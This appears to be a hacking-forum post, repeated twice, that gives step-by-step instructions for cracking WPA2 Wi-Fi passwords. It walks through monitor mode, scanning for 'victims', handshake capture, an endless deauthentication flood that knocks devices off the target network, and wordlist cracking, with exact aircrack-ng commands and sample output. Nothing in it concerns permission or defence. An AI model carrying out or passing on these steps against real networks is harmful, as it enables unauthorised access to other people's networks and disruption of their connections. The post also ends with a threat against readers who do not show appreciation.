odz75
Phishing Expert
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
400 XP
this works only on WPA2 networks (almost every network uses WPA2)
The method we will use it brute forcing.
So let's start >>>>>>>>>>>>>>>>>>>>>>>>>
Requirements:
1. aireplay-ng
2. Kali Linux
3. Airodump-ng
4. Aircrack-ng
5. A word list
6. Handshake (we will get it in this tutorial)
7. A wireless card compatible with monitor mode
0. Fire up your kali linux
So first, we need to find our target, first step is to put our wireless card in monitor mode.
1. Putting Wireless card in monitor mode:
Open a console and type:
iwconfig
This command willl show you your wireless cards , it should look like this:
!Ogzopo-E96uUMTEqWsf5xzaaL9eRuTiGZfZFW8CLoho
as you can see i have the wlan0 card, please look at the mode, in my case it is Managed, we need to change it in monitor mode using this command:
airmon-ng start wlan0
type iwconfig again and check if you wireless card is on monitor mode. if you have succesfully did this correctly, congrats, we are now ready to scan for victims
2. Scanning for victims
Using airodump-ng we will scan wireless networks, by running this command:
airodump-ng wlan0mon
I used wlan0mon instead of wlan0 because when we used airmon-ng to change the mode we also renamed it to wlan0mon, mon=monitor
After running the command you should see something like this:
!LyLysVpxxeFSdw04agcJZNFP8BhRPAU24uTKr4xF1KQ
wait until you see your network, then press CTRL+C
After you found your network, please copy the BSSID and channel and keep them.
3. Capturing HandShake
here is the fun party, we will capture the handshake.
We will use airodump-ng to get the handshake.
first, run the following command:
airodump-ng -c <channel of target> --bssid <bssid of target> -w . wlan1mon
replace <channel of target> with the channel
and <bssid of target> with bssid.
we are now listening for handshakes, we will capture it when a device connects to the network, if you are impatient, you can flood the wifi network (without being connected to it) to force devices to reconnect to wifi using this command in another window:
aireplay-ng -0 0 -a <bssid of target> wlan0
if it doesnt work, try wlan0mon
so lets explain the command:
-0 > means that we are making a deauth attack
0 > means that we will send infinite packets to the wifi
-a > is the flag for wifi network
wlan0 > is our interface, use wlan0mon in case it doesnt work.
let the command run until you see this:
!p2WQXA3rQofz_izn10RpcmRDzLG0zhAw33mgurPOaZI
as you can see, in the bigger window, we have a WPA handshake notifications, that means you captured the handshake!
you can see your handshake in the folder you run the command, it is a .cap file
after you get the handshake, stop the aireplay-ng command using CTRL+C
4.Cracking the password
we will use aircrack-ng, the .cap file, and a word list.
put this command:
aircrack-ng -a2 -b <bssid of target> -w <wordlist file> <capture file>
replace <bssid of target> with bssid, <wordlist file> with wordlist file, then <capture file> with capture file name
if the password is in the word list, you will get something like this:
Aircrack-ng 1.2 beta3 [00:01:49] 111040 keys tested (1017.96 k/s) KEY FOUND! [ password123 ] Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89 59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71 2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73 6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78 8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21 EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
Congrats! You cracked the password
TOOK ME LIKE 30 MINS TO WRITE THIS, SHOW APPRECIATION OR I WILL REPORT YOU AND YOU WILL GET BANNED
Leechers will be Fired in the World War III
The method we will use it brute forcing.
So let's start >>>>>>>>>>>>>>>>>>>>>>>>>
Requirements:
1. aireplay-ng
2. Kali Linux
3. Airodump-ng
4. Aircrack-ng
5. A word list
6. Handshake (we will get it in this tutorial)
7. A wireless card compatible with monitor mode
0. Fire up your kali linux
So first, we need to find our target, first step is to put our wireless card in monitor mode.
1. Putting Wireless card in monitor mode:
Open a console and type:
iwconfig
This command willl show you your wireless cards , it should look like this:
You must upgrade your account or reply in the thread to view the hidden content.
as you can see i have the wlan0 card, please look at the mode, in my case it is Managed, we need to change it in monitor mode using this command:
airmon-ng start wlan0
type iwconfig again and check if you wireless card is on monitor mode. if you have succesfully did this correctly, congrats, we are now ready to scan for victims
2. Scanning for victims
Using airodump-ng we will scan wireless networks, by running this command:
airodump-ng wlan0mon
I used wlan0mon instead of wlan0 because when we used airmon-ng to change the mode we also renamed it to wlan0mon, mon=monitor
After running the command you should see something like this:
You must upgrade your account or reply in the thread to view the hidden content.
wait until you see your network, then press CTRL+C
After you found your network, please copy the BSSID and channel and keep them.
3. Capturing HandShake
here is the fun party, we will capture the handshake.
We will use airodump-ng to get the handshake.
first, run the following command:
airodump-ng -c <channel of target> --bssid <bssid of target> -w . wlan1mon
replace <channel of target> with the channel
and <bssid of target> with bssid.
we are now listening for handshakes, we will capture it when a device connects to the network, if you are impatient, you can flood the wifi network (without being connected to it) to force devices to reconnect to wifi using this command in another window:
aireplay-ng -0 0 -a <bssid of target> wlan0
if it doesnt work, try wlan0mon
so lets explain the command:
-0 > means that we are making a deauth attack
0 > means that we will send infinite packets to the wifi
-a > is the flag for wifi network
wlan0 > is our interface, use wlan0mon in case it doesnt work.
let the command run until you see this:
You must upgrade your account or reply in the thread to view the hidden content.
as you can see, in the bigger window, we have a WPA handshake notifications, that means you captured the handshake!
you can see your handshake in the folder you run the command, it is a .cap file
after you get the handshake, stop the aireplay-ng command using CTRL+C
4.Cracking the password
we will use aircrack-ng, the .cap file, and a word list.
put this command:
aircrack-ng -a2 -b <bssid of target> -w <wordlist file> <capture file>
replace <bssid of target> with bssid, <wordlist file> with wordlist file, then <capture file> with capture file name
if the password is in the word list, you will get something like this:
Aircrack-ng 1.2 beta3 [00:01:49] 111040 keys tested (1017.96 k/s) KEY FOUND! [ password123 ] Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89 59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71 2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73 6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78 8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21 EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
Congrats! You cracked the password
TOOK ME LIKE 30 MINS TO WRITE THIS, SHOW APPRECIATION OR I WILL REPORT YOU AND YOU WILL GET BANNED
Leechers will be Fired in the World War III